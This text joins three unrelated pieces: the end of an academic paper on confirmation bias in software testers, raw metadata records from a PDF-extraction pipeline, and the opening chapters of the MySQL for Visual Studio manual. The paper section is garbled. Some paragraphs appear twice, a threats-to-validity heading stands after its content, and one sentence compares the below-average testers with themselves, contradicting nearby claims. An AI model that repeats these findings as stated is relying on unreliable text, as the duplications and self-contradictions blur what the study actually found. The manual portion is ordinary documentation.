Figure 6 shows the Vincent Curves for test severity values of two groups of testers. Testers are grouped according to the number of bugs reported by them as testers reporting above and below average number of bugs. On the contrary to what we have expected, group of testers reporting bugs below average value had exhibited a more strategic approach during interactive confirmation bias tests. This group of testers starts with a low level severe test and they progressively exclude more alternatives [6]. Moreover, starting from the second percent of the instances given during the interactive tests, test severity of the tester group having \(N_{BUG}\) value lower than average is always higher than that of the other group. In other words, for each instance given by members of this group during the interactive test more alternative hypotheses are eliminated. We can make an analogy between the testing strategies exhibited by the members of this group during interactive confirmation bias tests. The testers with \(N_{BUG}\) value below average seem to run tests that eliminate more software failure scenarios during the software testing phase. However, such a behavior is an expected result in finding more of the bugs in the code.

In order to explain this, we analyzed the relationship between total number of bugs reported \((N_{BUG})\) and total number of production defects caused by each tester \((N_{PROD_DEF})\). The Spearman correlation value between these two variables is 0.8234, where +1 or -1 occurs when each of the variables is a perfect monotone function of the other. As shown in Figure 8, while the total number of bugs reported by a tester increases, total number of production defects introduced by that tester also increases.
High correlation between total number of reported bugs and production defect count may indicate another phenomenon, namely, testers who report more bugs might be assigned codes with very high defect density requiring immense testing effort. However, for each tester there is also a time pressure to end the testing procedure and this may result in the deployment of the defected codes. Another explanation for the outcome shown in Figure 8, is that bugs are not classified according to their severities. Hence, large number of reported bugs does not necessarily mean that a significant portion of severe bugs has been reported.
Moreover, as shown in Figure 10 testers who report bugs more than the average number of reported bugs \((N_{BUG,above\ average})\) are less likely to follow a testing strategy in terms of test severity during interactive tests. A reasonable testing strategy suggested by Poletiek is to start with a low level severe test and to progressively increase test severity [6]. The test severity curve of testers who report bugs less than the average, is in line with Poletiek’s testing strategy compared to the curve of the testers who report bugs below average. In addition, when the percentage of total instances given by subjects during the interactive test exceeds 10%, the test severity of testers who report bugs below average is always higher.
This outcome of interactive test suggests that the testers are more likely to follow Poletiek’s testing strategy during software testing,
so that initially less severe tests are made. Hence fewer bugs are detected, yet tester gains an idea about the sections of the code that must be tested and possible defect types. As a result, tester can increase the severity of his/her tests which leads his/her finding more bugs that are severe.
In terms of internal validity, our quasi-independent variables are experience, education, activeness in software development, and software development methodology. The measures for these variables, which are confirmation bias metrics were taken within a week for both Group 1 and Group 2. Moreover, within any of the groups there was no event in between the confirmation bias tests that can affect subjects’ performance.
However, problem may arise due to different experimental conditions. For instance, compared to graduate computer engineering students, stress factor of company workers due to the fact that they always have to rush the next release may have biased the results. In order to avoid mono-operation bias as a construct validity threat, we used more than a single dependent variable. We extracted metrics from both written and interactive tests as well as Wason’s elimination/enumeration index [5]. As a result, we have avoided under-representing the construct and got rid of irrelevancies.
We have used two datasets to externally validate our results. We will continue expanding the size and variety of our dataset going forward.
6.4 Threats to Validity
We would like to address internal, external, construct, and statistical validity.
Finally, as shown in Figure 9, all falsifiers are among testers who report bugs below average, whereas a higher portion of the testers who report bugs above average are verifiers. This result brings about the possibility that testers who report bugs above average exhibit more tendency to verify that production defects do not exist in the codes they test. Therefore, they exhibit confirmation bias in this sense.
The distribution of falsifiers, verifiers and matchers for testers who cause production defects above and below average is also in line with the distribution given in Figure 11. In addition, as shown in Figure 10, test severity curves for testers who cause production defects below and above average exhibit a behavior similar to the curves in Figure 6.
Figure 8. High correlation between production defect and total number of reported bugs (Spearman rank correlation: 0.8234 )
Figure 9. Distribution of falsifiers, verifiers, and matchers among testers who report bugs above and below average amount, according to Reich and Ruth’s method.
Finally, as shown in Figure 9, all falsifiers are among testers who report bugs below average, whereas a higher portion of the testers who report bugs above average are verifiers. This result brings about the possibility that testers who report bugs above average exhibit more tendency to verify that production defects do not exist in the codes they test. Therefore, they exhibit confirmation bias in this sense.
The distribution of falsifiers, verifiers and matchers for testers who cause production defects above and below average is also in line with the distribution given in Figure 11. In addition, as shown in Figure 10, test severity curves for testers who cause production defects below and above average exhibit a behavior similar to the curves in Figure 6.
Figure 10. Vincent curves for test severity of testers who cause production defect above and below average respectively.
We used bootstrapped Kolmogorov-Smirnov tests to statistically validate our results. We used this test since we do not have any prior knowledge of the distribution of the metric values and the underlying distributions are discontinuous.
7. CONCLUSION AND FUTURE WORK
During all levels of software testing the attempt should be to fail the code to reduce software defect density. In an early work, Teasley et al. empirically showed that people have more tendency to make positive tests rather than negative tests during software testing phase due to confirmation bias [8]. In order to empirically analyze the effect of confirmation bias on software defect density, we need to measure/quantify confirmation bias. In this study, we prepared both interactive and written tests based on Wason’s experiments that have been replicated for decades. However, unlike other disciplines, to the best of our knowledge, Wason’s experiments have not been used in the field of software testing and development. Having performed our tests to testers and developers of a large scale telecommunication company in Europe as well as a group of computer engineering graduate students, we analyzed these test results based on the existing work in the cognitive psychology literature as well as the metrics we defined. Our results can be summarized as follows:
- Confirmation bias levels of individuals who have been trained in logical reasoning and mathematical proof techniques are significantly lower. In other words, given a statement such individuals show tendency to refute that statement rather than immediately accepting its correctness.
- A significant effect of experience in software development/testing has not been observed. This implies that training in organizations is focused on tasks rather than personal skills. Considering that the percentage of people with low confirmation bias is very low in the population [5, 6, 7], an organization should find ways to improve basic logical reasoning and strategic hypothesis testing skills of their software developers/testers.
- Individuals, who are experienced but inactive in software development/testing, score better in confirmation bias tests than active experienced software developers/testers. This implies that companies should balance work schedule of testers similar to jet pilots and allow them periodically to take some time off the regular routine.
- Another finding is that we do not observe any difference in confirmation bias levels in favor of the TSP/PSP team. This raises a question on the validity of models such as TSP/PSP that are promising defect free and high quality software development.
- High levels of defect rates introduced by software developers are directly related to confirmation bias.
- High levels of confirmation bias among software testers are very likely to result in an increase in the number of production defects.
As future work, we plan to extend our dataset and replicate this study in other software development companies. Moreover we will construct software defect prediction models that use confirmation bias metrics as people related set of metrics in addition to product and process metrics. It is highly probable that confirmation bias metrics would improve the prediction performance of learning based defect prediction models which we have been building over a decade.
8. ACKNOWLEDGMENTS
This research is supported in part by Turkish Scientific Research Council, TUBITAK, under grant number EEEAG108E014.
8. REFERENCES
|
{"Source-Url": "http://oro.open.ac.uk/45352/1/Promise2010.pdf", "len_cl100k_base": 12039, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 41507, "total-output-tokens": 13077, "length": "2e13", "weborganizer": {"__label__adult": 0.000492095947265625, "__label__art_design": 0.00037932395935058594, "__label__crime_law": 0.00038552284240722656, "__label__education_jobs": 0.005443572998046875, "__label__entertainment": 9.202957153320312e-05, "__label__fashion_beauty": 0.0002117156982421875, "__label__finance_business": 0.0005359649658203125, "__label__food_dining": 0.0004105567932128906, "__label__games": 0.0007147789001464844, "__label__hardware": 0.00069427490234375, "__label__health": 0.0008368492126464844, "__label__history": 0.00023734569549560547, "__label__home_hobbies": 0.00012385845184326172, "__label__industrial": 0.00040030479431152344, "__label__literature": 0.0006084442138671875, "__label__politics": 0.00027823448181152344, "__label__religion": 0.0004732608795166016, "__label__science_tech": 0.017852783203125, "__label__social_life": 0.0002505779266357422, "__label__software": 0.00519561767578125, "__label__software_dev": 0.96337890625, "__label__sports_fitness": 0.00039005279541015625, "__label__transportation": 0.0005612373352050781, "__label__travel": 0.00021696090698242188}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 53978, 0.05602]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 53978, 0.4656]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 53978, 0.92883]], "google_gemma-3-12b-it_contains_pii": [[0, 894, false], [894, 4807, null], [4807, 11317, null], [11317, 17232, null], [17232, 22241, null], [22241, 26970, null], [26970, 30405, null], [30405, 34921, null], [34921, 38656, null], [38656, 44537, null], [44537, 48278, null], [48278, 53978, null]], "google_gemma-3-12b-it_is_public_document": [[0, 894, true], [894, 4807, null], [4807, 11317, null], [11317, 17232, null], [17232, 22241, null], [22241, 26970, null], [26970, 30405, null], [30405, 34921, null], [34921, 38656, null], [38656, 44537, null], [44537, 48278, null], [48278, 53978, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 53978, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 53978, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 53978, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 53978, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 53978, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 53978, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 53978, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 53978, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 53978, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 53978, null]], "pdf_page_numbers": [[0, 894, 1], [894, 4807, 2], [4807, 11317, 3], [11317, 17232, 4], [17232, 22241, 5], [22241, 26970, 6], [26970, 30405, 7], [30405, 34921, 8], [34921, 38656, 9], [38656, 44537, 10], [44537, 48278, 11], [48278, 53978, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 53978, 0.27491]]}
|
olmocr_science_pdfs
|
2024-12-08
|
2024-12-08
|
a29c285355f0c2534d1407cc5bb38ba3846c4772
|
[REMOVED]
|
{"Source-Url": "https://orca.cardiff.ac.uk/id/eprint/91297/1/1412%207834v3.pdf", "len_cl100k_base": 9922, "olmocr-version": "0.1.49", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 46803, "total-output-tokens": 11750, "length": "2e13", "weborganizer": {"__label__adult": 0.00040268898010253906, "__label__art_design": 0.0004627704620361328, "__label__crime_law": 0.00122833251953125, "__label__education_jobs": 0.0014829635620117188, "__label__entertainment": 0.00011771917343139648, "__label__fashion_beauty": 0.00026154518127441406, "__label__finance_business": 0.0010519027709960938, "__label__food_dining": 0.00045609474182128906, "__label__games": 0.0010652542114257812, "__label__hardware": 0.0012311935424804688, "__label__health": 0.0011949539184570312, "__label__history": 0.0004944801330566406, "__label__home_hobbies": 0.00018668174743652344, "__label__industrial": 0.0009055137634277344, "__label__literature": 0.0003981590270996094, "__label__politics": 0.0006084442138671875, "__label__religion": 0.0005402565002441406, "__label__science_tech": 0.39306640625, "__label__social_life": 0.00014925003051757812, "__label__software": 0.019195556640625, "__label__software_dev": 0.57421875, "__label__sports_fitness": 0.0003833770751953125, "__label__transportation": 0.0007371902465820312, "__label__travel": 0.0002522468566894531}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 39965, 0.02521]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 39965, 0.52678]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 39965, 0.86198]], "google_gemma-3-12b-it_contains_pii": [[0, 0, null], [0, 8955, false], [8955, 12519, null], [12519, 15852, null], [15852, 18262, null], [18262, 21749, null], [21749, 24796, null], [24796, 27869, null], [27869, 30328, null], [30328, 33870, null], [33870, 36888, null], [36888, 37242, null], [37242, 39965, null]], "google_gemma-3-12b-it_is_public_document": [[0, 0, null], [0, 8955, true], [8955, 12519, null], [12519, 15852, null], [15852, 18262, null], [18262, 21749, null], [21749, 24796, null], [24796, 27869, null], [27869, 30328, null], [30328, 33870, null], [33870, 36888, null], [36888, 37242, null], [37242, 39965, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 39965, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 39965, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 39965, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 39965, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 39965, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 39965, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 39965, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 39965, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 39965, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 39965, null]], "pdf_page_numbers": [[0, 0, 1], [0, 8955, 2], [8955, 12519, 3], [12519, 15852, 4], [15852, 18262, 5], [18262, 21749, 6], [21749, 24796, 7], [24796, 27869, 8], [27869, 30328, 9], [30328, 33870, 10], [33870, 36888, 11], [36888, 37242, 12], [37242, 39965, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 39965, 0.0]]}
|
olmocr_science_pdfs
|
2024-11-25
|
2024-11-25
|
fc1fbb1ba33cd45c043c22c8bada5a728aa60673
|
MySQL for Visual Studio
Abstract
This is the MySQL™ for Visual Studio Reference Manual. It documents the MySQL for Visual Studio through 1.2.8.
For notes detailing the changes in each release, see the MySQL for Visual Studio Release Notes.
For legal information, see the Legal Notices.
For help with using MySQL, please visit either the MySQL Forums or MySQL Mailing Lists, where you can discuss your issues with other MySQL users.
**Licensing information.** This product may include third-party software, used under license. If you are using a Commercial release of MySQL for Visual Studio, see the MySQL for Visual Studio Commercial License Information User Manual for licensing information, including licensing information relating to third-party software that may be included in this Commercial release. If you are using a Community release of MySQL for Visual Studio, see the MySQL for Visual Studio Community License Information User Manual for licensing information, including licensing information relating to third-party software that may be included in this Community release.
Document generated on: 2018-11-14 (revision: 59964)
# Table of Contents
Preface and Legal Notices .................................................................................................................. v
1 General Information .......................................................................................................................... 1
1.1 New in Version 2.0 ....................................................................................................................... 6
1.2 New in Version 1.2 ....................................................................................................................... 6
2 Installing MySQL for Visual Studio ................................................................................................. 9
3 The MySQL Toolbar ......................................................................................................................... 11
4 Making a Connection ...................................................................................................................... 13
5 Editing ............................................................................................................................................... 17
5.1 MySQL SQL Editor .................................................................................................................... 17
5.2 Code Editors ............................................................................................................................. 18
5.3 Editing Tables ............................................................................................................................ 20
5.3.1 Column Editor .................................................................................................................... 22
5.3.2 Column Properties ............................................................................................................. 23
5.3.3 Table Properties .............................................................................................................. 24
5.4 Editing Views .............................................................................................................................. 26
5.5 Editing Indexes ........................................................................................................................... 28
5.6 Editing Foreign Keys .................................................................................................................. 29
5.7 Editing Stored Procedures and Functions .................................................................................. 30
5.8 Editing Triggers .......................................................................................................................... 32
6 MySQL Website Configuration Tool ............................................................................................... 35
7 MySQL Project Items ....................................................................................................................... 45
7.1 Minimum Requirements ............................................................................................................. 45
7.2 MySQL ASP.NET MVC Items .................................................................................................... 45
7.3 MySQL Windows Forms Items .................................................................................................. 54
8 MySQL Data Export Tool ................................................................................................................. 57
9 Using the ADO.NET Entity Framework ........................................................................................... 65
10 DDL T4 Template Macro ................................................................................................................ 67
11 Debugging Stored Procedures and Functions ................................................................................ 69
A MySQL for Visual Studio Frequently Asked Questions .................................................................... 81
Preface and Legal Notices
This is the User Manual for the MySQL for Visual Studio.
**Licensing information.** This product may include third-party software, used under license. If you are using a Commercial release of MySQL for Visual Studio, see the MySQL for Visual Studio Commercial License Information User Manual for licensing information, including licensing information relating to third-party software that may be included in this Commercial release. If you are using a Community release of MySQL for Visual Studio, see the MySQL for Visual Studio Community License Information User Manual for licensing information, including licensing information relating to third-party software that may be included in this Community release.
**Legal Notices**
Copyright © 2004, 2018, Oracle and/or its affiliates. All rights reserved.
This software and related documentation are provided under a license agreement containing restrictions on use and disclosure and are protected by intellectual property laws. Except as expressly permitted in your license agreement or allowed by law, you may not use, copy, reproduce, translate, broadcast, modify, license, transmit, distribute, exhibit, perform, publish, or display any part, in any form, or by any means. Reverse engineering, disassembly, or decompilation of this software, unless required by law for interoperability, is prohibited.
The information contained herein is subject to change without notice and is not warranted to be error-free. If you find any errors, please report them to us in writing.
If this is software or related documentation that is delivered to the U.S. Government or anyone licensing it on behalf of the U.S. Government, then the following notice is applicable:
U.S. GOVERNMENT END USERS: Oracle programs, including any operating system, integrated software, any programs installed on the hardware, and/or documentation, delivered to U.S. Government end users are "commercial computer software" pursuant to the applicable Federal Acquisition Regulation and agency-specific supplemental regulations. As such, use, duplication, disclosure, modification, and adaptation of the programs, including any operating system, integrated software, any programs installed on the hardware, and/or documentation, shall be subject to license terms and license restrictions applicable to the programs. No other rights are granted to the U.S. Government.
This software or hardware is developed for general use in a variety of information management applications. It is not developed or intended for use in any inherently dangerous applications, including applications that may create a risk of personal injury. If you use this software or hardware in dangerous applications, then you shall be responsible to take all appropriate fail-safe, backup, redundancy, and other measures to ensure its safe use. Oracle Corporation and its affiliates disclaim any liability for any damages caused by use of this software or hardware in dangerous applications.
Oracle and Java are registered trademarks of Oracle and/or its affiliates. Other names may be trademarks of their respective owners.
Intel and Intel Xeon are trademarks or registered trademarks of Intel Corporation. All SPARC trademarks are used under license and are trademarks or registered trademarks of SPARC International, Inc. AMD, Opteron, the AMD logo, and the AMD Opteron logo are trademarks or registered trademarks of Advanced Micro Devices. UNIX is a registered trademark of The Open Group.
This software or hardware and documentation may provide access to or information about content, products, and services from third parties. Oracle Corporation and its affiliates are not responsible for and expressly disclaim all warranties of any kind with respect to third-party content, products, and services.
Access to Oracle Support
unless otherwise set forth in an applicable agreement between you and Oracle. Oracle Corporation and its affiliates will not be responsible for any loss, costs, or damages incurred due to your access to or use of third-party content, products, or services, except as set forth in an applicable agreement between you and Oracle.
This documentation is NOT distributed under a GPL license. Use of this documentation is subject to the following terms:
You may create a printed copy of this documentation solely for your own personal use. Conversion to other formats is allowed as long as the actual content is not altered or edited in any way. You shall not publish or distribute this documentation in any form or on any media, except if you distribute the documentation in a manner similar to how Oracle disseminates it (that is, electronically for download on a Web site with the software) or on a CD-ROM or similar medium, provided however that the documentation is disseminated together with the software on the same medium. Any other use, such as any dissemination of printed copies or use of this documentation, in whole or in part, in another publication, requires the prior written consent from an authorized representative of Oracle. Oracle and/or its affiliates reserve any and all rights to this documentation not expressly granted above.
Access to Oracle Support
Oracle customers that have purchased support have access to electronic support through My Oracle Support. For information, visit http://www.oracle.com/pls/topic/lookup?ctx=acc&id=info or visit http://www.oracle.com/pls/topic/lookup?ctx=acc&id=trs if you are hearing impaired.
Chapter 1 General Information
Table of Contents
1.1 New in Version 2.0 .......................................................................................................................... 1
1.2 New in Version 1.2 .......................................................................................................................... 6
This chapter provides general information about MySQL for Visual Studio and how it has changed.
MySQL for Visual Studio provides access to MySQL objects and data from Visual Studio. As a Visual Studio package, MySQL for Visual Studio integrates directly into Server Explorer providing the ability to create new connections and work with MySQL database objects.
Functionality concepts includes:
• **SQL Development**: By integrating directly into Visual Studio, database objects (tables, views, stored routines, triggers, indexes, etc) can be created, altered, or dropped directly inside Server Explorer.
Visual object editors include helpful information to guide you through the editing process. Standard data views are also available to help you view your data.
• **Query Designer**: Visual Studio’s query design tool is also directly supported. With this tool, you can query and view data from tables or views while also combining filters, group conditions, and parameters. Stored routines (both with and without parameters) can also be queried.
• **Stored Routine Debugging**: Use the full debugging support for stored routines. Using the standard Visual Studio environment and controls, you can set breakpoints, add watches, and step into, out of, and over routines and calls. Local variables can be added to the watch window and call stack navigation is also supported.
• **Entity Framework**: The Entity Framework is supported, to allow template based code generation and full support of the model designers and wizards.
For notes detailing the changes in each release, see the MySQL for Visual Studio Release Notes.
1.1 New in Version 2.0
This section summarizes many of the new features added to the 2.0 release series in relation to the MySQL for Visual Studio 1.2 release series. MySQL for Visual Studio 2.0.5 is a development release.
New features are described in the following sections:
• **Viewing MySQL Query Output**
• **Version Support for Visual Studio**
• **Switching Connections from Script and Code Editors**
• **Making a Connection**
• **MySQL Toolbar**
• **MySQL JavaScript and Python Code Editors**
For notes detailing the changes in each point release, see the MySQL for Visual Studio Release Notes.
**Viewing MySQL Query Output**
An output pane was added to the MySQL SQL, JavaScript, and Python editors to display information about each executed query. The output pane includes the information that previously appeared in the Messages tab.
**Figure 1.1 MySQL SQL Editor Output**

**Version Support for Visual Studio**
Beginning with MySQL for Visual Studio 2.0.5:
- Support for Microsoft Visual Studio 2017 was added.
- Support for Microsoft Visual Studio 2010 was removed.
**Switching Connections from Script and Code Editors**
A drop-down list was added to the toolbar of the SQL, JavaScript, and Python editors from which you can select a valid connection. JavaScript and Python editors show only the connections that support the X Protocol.
**Figure 1.2 Switching Connections**

**Making a Connection**
A new MySQL Connections Manager tool was added, and it can create and manage MySQL connections. It is found under the Server Explorer.
This button opens the **MySQL Connections Manager** dialog that enables the sharing of stored MySQL connections with MySQL Workbench, if it is installed. MySQL connections are displayed in a simpler way and can be created and edited from within this dialog. These connections can be imported to the Visual Studio **Server Explorer** for use with Visual Studio.
After opening the **MySQL Connections Manager**:
To add a new MySQL connection with the **MySQL Connections Manager**:
MySQL Toolbar
In the **Server Explorer**, and with MySQL Server 5.7, the MySQL connection context-menu was changed to show the options to create JavaScript or Python scripts, along with the existing SQL script option.
Figure 1.6 MySQL Toolbar: Create New Script
Select **JavaScript** or **Python** to launch the MySQL code editor for the selected language.
MySQL JavaScript and Python Code Editors
Use the code editor to write and execute JavaScript or Python queries with MySQL Server 5.7 and higher, or as before, use SQL queries.
Figure 1.7 MySQL Editor: Script Template
Select **MyJs Script** or **MyPy Script** to launch the MySQL code editor for the selected language.
Figure 1.8 MySQL Editor: JavaScript Code Editor
1.2 New in Version 1.2
This section summarizes many of the new features added to 1.2.x in relation to earlier versions of MySQL for Visual Studio.
For notes detailing the changes in each point release, see the MySQL for Visual Studio Release Notes.
Support for MySQL 8.0 Features
MySQL for Visual Studio 1.2.8 supports the MySQL 8.0 release series (requires MySQL Connector.NET 6.9.12, 6.10.7, or 8.0.11) including:
- MySQL data dictionary, which uses INFORMATION_SCHEMA tables rather than tables in the mysql database (see MySQL Data Dictionary).
- The caching_sha2_password authentication plugin introduced in MySQL 8.0 (see Caching SHA-2 Pluggable Authentication).
Version Support for Visual Studio
Beginning with MySQL for Visual Studio 1.2.7:
- Support for Microsoft Visual Studio 2017 was added.
• Support for Microsoft Visual Studio 2010 was removed.
**Item Templates versus Project Templates**
Beginning with MySQL for Visual Studio 1.2.5, the project templates used to create MySQL Windows Forms and MySQL MVC projects are no longer be available, as they were replaced with MySQL Project Items:
- **MySQL MVC Item** replaces *MySQL MVC Project*.
- **MySQL Windows Forms Item** replaces *Windows Form Project*.
These item templates offer the benefit of adding items to existing projects new windows forms or MVC controllers/views connected to MySQL, based on MySQL Entity Framework models, without the need of create an entirely new MySQL project.
In addition, item templates better follow the Visual Studio template standards, which are oriented to create projects regardless of the database connectivity.
For information about using Item Templates, see *Chapter 7, MySQL Project Items*.
Chapter 2 Installing MySQL for Visual Studio
MySQL for Visual Studio is an add-on for Microsoft Visual Studio that simplifies the development of applications using data stored by the MySQL RDBMS. Many MySQL features also require that MySQL Connector/NET be installed on the same host where you perform Visual Studio development. Connector/NET is a separate product with several versions.
The options for installing MySQL for Visual Studio are:
• Using MySQL Installer (preferred): Download and execute the MySQL Installer.
With this option you can download and install MySQL Server, MySQL for Visual Studio, and Connector/NET together from the same software package, based on the server version. Initially, MySQL Installer assists you by evaluating the software prerequisites needed for the installation. Thereafter, MySQL Installer enables you to keep your installed products updated or to easily add and remove related MySQL products.
For additional information about using MySQL Installer with MySQL products, see MySQL Installer for Windows.
• Using the standalone Zip or MSI file: This option is ideal if you have MySQL Server and Connector/NET installed already. Use the information in this section to determine which version of MySQL for Visual Studio to install.
Minimum Requirements
MySQL for Visual Studio 1.2.8 is compatible with Connector/NET 6.9.12, 6.10.7 and 8.0.11. Previous Connector/NET versions are not supported by this release.
MySQL for Visual Studio operates with several versions of Visual Studio, although the extent of support is based on your installed versions of Connector/NET and Visual Studio. MySQL for Visual Studio no longer supports Visual Studio 2010 or 2008. Minimum requirements for the supported versions of Visual Studio are as follows:
• Visual Studio 2017 (Community, Professional, and Enterprise):
MySQL for Visual Studio 1.2.7 or 2.0.5 with Connector/NET 6.9.8
• Visual Studio 2015 (Community, Professional, and Enterprise):
MySQL for Visual Studio 1.2.7 or 2.0.2 with Connector/NET 6.9.8
• Visual Studio 2013 (Professional, Premium, Ultimate):
• .NET Framework 4.5.2 (install first).
• MySQL for Visual Studio 1.2.1 or 2.0.0 with Connector/NET 6.9.8
• Visual Studio 2012 (Professional, Test Professional, Premium, Ultimate):
• .NET Framework 4.5.2 (install first).
• MySQL for Visual Studio 1.2.1 or 2.0.0 with Connector/NET 6.9.8
MySQL for Visual Studio does not support Express versions of Microsoft development products, including the Visual Studio and the Microsoft Visual Web Developer. To use Connector/NET with Express versions
of Microsoft development products, use Connector/NET 6.9 or later, without installing the MySQL for Visual Studio.
The following table shows the support information for MySQL for Visual Studio.
### Table 2.1 Support Information for Companion Products
<table>
<thead>
<tr>
<th>MySQL for Visual Studio Version</th>
<th>MySQL Connector/NET Version Supported</th>
<th>Visual Studio Version Supported</th>
<th>MySQL Server Versions Supported</th>
<th>Notes</th>
</tr>
</thead>
<tbody>
<tr>
<td>2.0</td>
<td>8.0, 6.10, 6.9</td>
<td>2017, 2015, 2013, 2012</td>
<td>5.7, 5.6, 5.5</td>
<td>Enables MySQL Configurations Manager and code editors (with MySQL 5.7).</td>
</tr>
<tr>
<td>1.2</td>
<td>8.0, 6.10, 6.9</td>
<td>2017, 2015, 2013, 2012</td>
<td>8.0, 5.7, 5.6, 5.5</td>
<td>Support for MySQL 8.0 features requires MySQL for Visual Studio 1.2.8 or higher.</td>
</tr>
</tbody>
</table>
### MySQL Connector/NET Restrictions
MySQL for Visual Studio is closely tied to Connector/NET, but they are two separate products that can be used without one another. The following restrictions apply:
- MySQL for Visual Studio cannot be installed alongside any version of Connector/NET 6.6 and before, which must be removed before installing MySQL for Visual Studio.
- The following MySQL for Visual Studio features require Connector/NET:
- The Entity Framework Designer
- The Website Configuration Tool
- Debugging Stored Procedures and Functions
- The DDL T4 Template Macro (to generate a database from an EF Model)
Chapter 3 The MySQL Toolbar
The optional MySQL toolbar includes MySQL specific functionality and links to external MySQL tools such as MySQL Workbench and MySQL Utilities. Additional actions are available from the context menu for each data connection.
After installing MySQL for Visual Studio, the MySQL toolbar is available by selecting View, Toolbars, MySQL from the main menu. To position the MySQL toolbar within Visual Studio, do the following:
1. From the main menu, click Tools and then Customize.
2. In the Toolbars tab, select MySQL to highlight it. The check box should have a check mark to indicate that the toolbar is visible.
3. Select a dock location from Modify Selection. For example, the following figure shows the MySQL toolbar in the Dock location: Left position. Other dock locations are Top, Right, and Bottom.
Figure 3.1 MySQL for Visual Studio Toolbar and Context Menu
The MySQL toolbar provides shortcuts to some of the main features of MySQL for Visual Studio:
- **MySQL Script Window**: Opens a new MySQL script window using the selected connection. All available MySQL connections are listed in a submenu, which can be selected on the toolbar:
The MySQL script window supports the IntelliSense feature for easing MySQL script creation inside Visual Studio.
- **Debug MySQL Routine**: Starts a debugging session on a selected MySQL stored routine inside Visual Studio.
- **MySQL Data Export Tool**: Opens a new tabbed-window of the Data Export tool.
- **MySQL Workbench SQL Editor**: Opens a new Workbench with an SQL editor window using the current MySQL connection, if MySQL Workbench has been installed.
- **MySQL Utilities Console**: Opens a new console window for the MySQL Utilities tool, if it is installed.
Chapter 4 Making a Connection
- Connect Using Server Explorer
- Connect with SSL and the X Protocol
MySQL for Visual Studio enables you to create, modify, and delete connections to MySQL databases.
**Connect Using Server Explorer**
To create a connection to an existing MySQL database, perform the following steps:
1. Start Visual Studio and open the Server Explorer by clicking **View** and then **Server Explorer** from the main menu.
2. Right-click the Data Connections node and then click **Add Connection**.
3. From the Add Connection window, click **Change** to open the Change Data Source dialog, then do the following:
a. Select **MySQL Database** from the list of data sources. Alternatively, you can select `<other>`, if **MySQL Database** is absent.
b. Select **.NET Framework Data Provider for MySQL** as the data provider.
c. Click **OK** to return to the Add Connections dialog.
4. Type a value for each of the following connection settings:
- **Server name:**
For example, **localhost** if the MySQL server is installed on the local computer.
- **User name:**
The name of a valid MySQL database user account, such as **root**.
- **Password:**
The password of the user account specified previously. Optionally, click **Save my password** to avoid having to enter the password for each connection session.
- **Database name:**
A default schema name is required to open the connection. Select a name from the list.
You can also set the port to connect with the MySQL server by clicking **Advanced**. To test connection with the MySQL server, set the server host name, the user name and the password, and then click **Test Connection**. If the test succeeds, the success confirmation dialog opens.
5. Click **OK** to create and store the new connection. The new connection with its tables, views, stored procedures, stored functions, and UDFs now appears within the Data Connections list of Server Explorer.
After the connection is successfully established, all settings are saved for future use. When you start Visual Studio for the next time, open the connection node in Server Explorer to establish a connection to the MySQL server again.
To modify or delete a connection, use the Server Explorer context menu for the corresponding node. You can modify any of the settings by overwriting the existing values with new ones. Note that the connection may be modified or deleted only if no active editor for its objects is opened: otherwise, you may lose your data.
Connect with SSL and the X Protocol
Connections that use the X Protocol can be configured to use SSL with PEM files. To use SSL encryption, connections must be created using the MySQL Connections Manager included with MySQL for Visual Studio 2.0.3 (or later) or with MySQL Workbench.
**Note**
SSL must be enabled in the target MySQL server instance and the X Plugin must be installed to support connections using SSL encryption and the X Protocol.
To create a connection to a MySQL database using SSL encryption and the X Protocol, perform the following steps:
1. Click the MySQL button ( ) in Visual Studio Server Explorer to open the **MySQL Connections Manager** window.
2. Click **Add New Connection** to create a new connection.
3. In the **Parameters** tab, add the host name, port, user name and password, and a default schema. Click **Test Connection** to verify the connection information. The following figure shows an example of parameter values within this tab.

